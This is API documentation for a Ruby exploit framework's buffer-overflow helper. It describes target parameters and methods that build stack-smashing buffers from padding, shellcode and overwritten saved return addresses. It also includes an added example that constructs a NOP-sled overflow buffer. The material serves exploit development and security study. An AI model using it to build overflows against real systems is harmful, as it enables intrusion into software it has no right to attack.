Module: Ronin::Exploits::Helpers::BufferOverflow

Defined in:
lib/ronin/exploits/helpers/buffer_overflow.rb

Overview

Adds methods to exploits for building buffers used in buffer overflows.

Target Parameters

The buffer overflow helper uses the following target parameters:

  • ip (required) - The Instruction Pointer (IP) value written over the saved return address on the stack.
  • bp - The Base Pointer (BP) value written over the saved frame pointer on the stack. When omitted, that slot is filled with the ip value.
  • buffer_length - The length of the buffer to overflow (the payload is padded out to this length).
  • stack_frame_repeat - The number of times to repeat the overwritten stack frame (saved BP + saved IP). Defaults to 1.

Payloads

Uses the Payloads::Shellcode payload by default.


Instance Attribute Details

#buffer ⇒ Object

The buffer to use for the buffer overflow.


# File 'lib/ronin/exploits/helpers/buffer_overflow.rb', line 50

def buffer
  @buffer
end

Class Method Details

.extended(obj) ⇒ Object


# File 'lib/ronin/exploits/helpers/buffer_overflow.rb', line 52

def self.extended(obj)
  obj.instance_eval do
    helper :binary
    helper :padding
  end
end

Instance Method Details

#build_buffer ⇒ String (protected)

Builds the buffer with the current target and payload to be used in the buffer overflow exploit.

Returns:

  • (String)

    The built buffer.

Raises:

  • (PayloadSize)

    The encoded payload is too large to fit within the targeted buffer length.


# File 'lib/ronin/exploits/helpers/buffer_overflow.rb', line 104

def build_buffer
  test_target!

  buffer = ''

  if target[:buffer_length]
    if raw_payload.length > target[:buffer_length]
      raise(PayloadSize,"the specified payload is too large for the target's buffer length")
    end

    # Note: this branch appends padding only; raw_payload is appended
    # solely in the else branch below.
    buffer << pad(target[:buffer_length] - raw_payload.length)
  else
    buffer << raw_payload
  end

  # pack comes from the :binary helper loaded in .extended
  ip_packed = pack(target.ip)

  stack_frame_repeat = (target[:stack_frame_repeat] || 1)

  # Each overwritten frame is [saved BP][saved IP]; without a bp param
  # the saved-BP slot is filled with the IP value as well.
  if target[:bp]
    buffer << ((pack(target[:bp]) + ip_packed) * stack_frame_repeat)
  else
    buffer << ((ip_packed * 2) * stack_frame_repeat)
  end

  return buffer
end
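The following is an added, stand-alone model of the layout the Target Parameters section and build_buffer describe; it is not code from ronin-exploits. The Hash-of-params target, the :arch key (little-endian x86 or x86_64), the exception class names and the NOP-sled-first layout are assumptions made here. One deliberate difference from build_buffer above: when buffer_length is set, the payload is written into the buffer after the sled rather than the region being padding only, so the return address can point anywhere inside the sled.

```ruby
# Added example (not ronin-exploits code): model of a stack-smashing buffer
# built from the target parameters ip, bp, buffer_length, stack_frame_repeat.
# Names below (build_overflow_buffer, frame_layout, :arch) are assumptions.

class PayloadSizeError < StandardError; end
class TargetDataMissingError < StandardError; end

# Pointer pack formats per architecture (assumed :arch param, default :x86).
PACK_FORMATS = { x86: 'V', x86_64: 'Q<' }.freeze # little-endian 32/64-bit

def pack_pointer(value, arch)
  fmt = PACK_FORMATS.fetch(arch) { raise ArgumentError, "unsupported arch: #{arch}" }
  [value].pack(fmt)
end

# Builds [padding][payload][saved BP][saved IP]{stack_frame_repeat}.
# padding_byte defaults to a NOP so that ip may point anywhere in the sled.
def build_overflow_buffer(target, payload, padding_byte: "\x90")
  raise TargetDataMissingError, "no such target param 'ip'" unless target.key?(:ip)

  arch    = target.fetch(:arch, :x86)
  payload = payload.b # byte semantics, regardless of source encoding
  buffer  = String.new(encoding: Encoding::BINARY)

  if target[:buffer_length]
    if payload.bytesize > target[:buffer_length]
      raise PayloadSizeError,
            "payload is #{payload.bytesize} bytes, buffer_length is #{target[:buffer_length]}"
    end
    buffer << padding_byte.b * (target[:buffer_length] - payload.bytesize)
  end
  buffer << payload

  ip_packed = pack_pointer(target[:ip], arch)
  # Without a bp param the saved-BP slot is filled with the IP value too.
  bp_packed = target[:bp] ? pack_pointer(target[:bp], arch) : ip_packed
  buffer << (bp_packed + ip_packed) * target.fetch(:stack_frame_repeat, 1)
  buffer
end

# Byte offsets of the overwritten slots, for comparison against the
# crashing frame as seen in a debugger.
def frame_layout(target, payload_size)
  width  = pack_pointer(0, target.fetch(:arch, :x86)).bytesize
  base   = target[:buffer_length] || payload_size
  repeat = target.fetch(:stack_frame_repeat, 1)
  { bp_offset: base, ip_offset: base + width, total: base + (2 * width * repeat) }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample target and a stand-in payload (20 int3 bytes).
  target  = { ip: 0xbffff7a0, bp: 0x41414141, buffer_length: 64, stack_frame_repeat: 2 }
  payload = "\xcc".b * 20
  buf = build_overflow_buffer(target, payload)
  puts buf.unpack1('H*')
  p frame_layout(target, payload.bytesize)
end
```

Because the sled precedes the payload, ip only has to land somewhere in the sled, which makes the exploit tolerant of small stack-address differences between runs; with the payload-first layout the return address must hit the payload's first byte exactly. The size check uses bytesize rather than length so a payload that is not a binary string is still measured in bytes.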

#payload_class ⇒ Class

Specifies that the exploit should use the Payloads::Shellcode class when searching for compatible payloads.

Returns:

  • (Class)

    Payloads::Shellcode.

Since:

  • 0.3.0


# File 'lib/ronin/exploits/helpers/buffer_overflow.rb', line 68

def payload_class
  Payloads::Shellcode
end

#test_target! ⇒ true

Tests that the selected target has the ip target parameter.

Returns:

  • (true)

    The target is valid.

Raises:

  • (TargetDataMissing)

    The target has no ip param.

Since:

  • 1.0.0


# File 'lib/ronin/exploits/helpers/buffer_overflow.rb', line 83

def test_target!
  super

  # the ip param is mandatory; every other buffer-overflow param is optional
  unless target.param?(:ip)
    raise(TargetDataMissing,"no such target param 'ip'")
  end
end